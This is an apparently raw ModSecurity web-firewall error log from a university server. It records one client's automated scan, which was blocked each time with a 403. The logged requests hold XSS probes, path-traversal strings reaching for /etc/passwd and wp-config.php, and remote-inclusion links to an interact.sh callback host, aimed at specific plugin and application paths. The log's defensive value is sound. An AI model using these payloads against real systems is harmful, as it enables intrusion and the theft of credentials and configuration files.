[Tue Aug 29 11:51:32.671054 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAmQ-ykAAAAb"]
[Tue Aug 29 11:51:33.711372 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VcCo-f0AAAnZfDIAAAAG"]
[Tue Aug 29 11:51:34.868775 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnd29sAAAAI"]
[Tue Aug 29 11:51:34.953100 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15VsCo-f0AAAnepMEAAAAK"]
[Tue Aug 29 11:51:35.085759 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnepMcAAAAK"]
[Tue Aug 29 11:51:35.560296 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAmQ-0AAAAAb"]
[Tue Aug 29 11:51:35.580261 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnB5XoAAAAJ"]
[Tue Aug 29 11:51:39.549007 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAhoHQEAAAAl"]
[Tue Aug 29 11:51:40.875691 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnkwbwAAAAY"]
[Tue Aug 29 11:51:42.545096 2023] [:error] [pid 2520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAnYkjwAAAAD"]
[Tue Aug 29 11:51:44.670214 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAm7nCsAAAAE"]
[Tue Aug 29 11:51:45.583114 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAn40wwAAAAW"]
[Tue Aug 29 11:51:47.541494 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAhoHREAAAAl"]
[Tue Aug 29 11:51:48.739518 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAm7nDoAAAAE"]
[Tue Aug 29 11:51:48.750918 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnmT3YAAAAd"]
[Tue Aug 29 11:51:50.705843 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAn0GXcAAAAa"]
[Tue Aug 29 11:51:51.632278 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnqj8wAAAAC"]
[Tue Aug 29 11:51:51.651501 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAnmT4MAAAAd"]
[Tue Aug 29 11:51:53.880138 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAnn1@cAAAAe"]
[Tue Aug 29 11:51:53.948735 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAmQ-2gAAAAb"]
[Tue Aug 29 11:51:55.721216 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnqj9kAAAAC"]
[Tue Aug 29 11:51:55.811110 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAnEqT8AAAAO"]
[Tue Aug 29 11:51:56.597786 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAlUlngAAAA0"]
[Tue Aug 29 11:51:57.609482 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnh6OIAAAAS"]
[Tue Aug 29 11:51:58.571358 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAm7nEcAAAAE"]
[Tue Aug 29 11:51:59.574845 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAhoHSsAAAAl"]
[Tue Aug 29 11:51:59.574900 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAni@9QAAAAU"]
[Tue Aug 29 11:52:01.594931 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAni@9oAAAAU"]
[Tue Aug 29 11:52:02.564809 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAnh6OwAAAAS"]
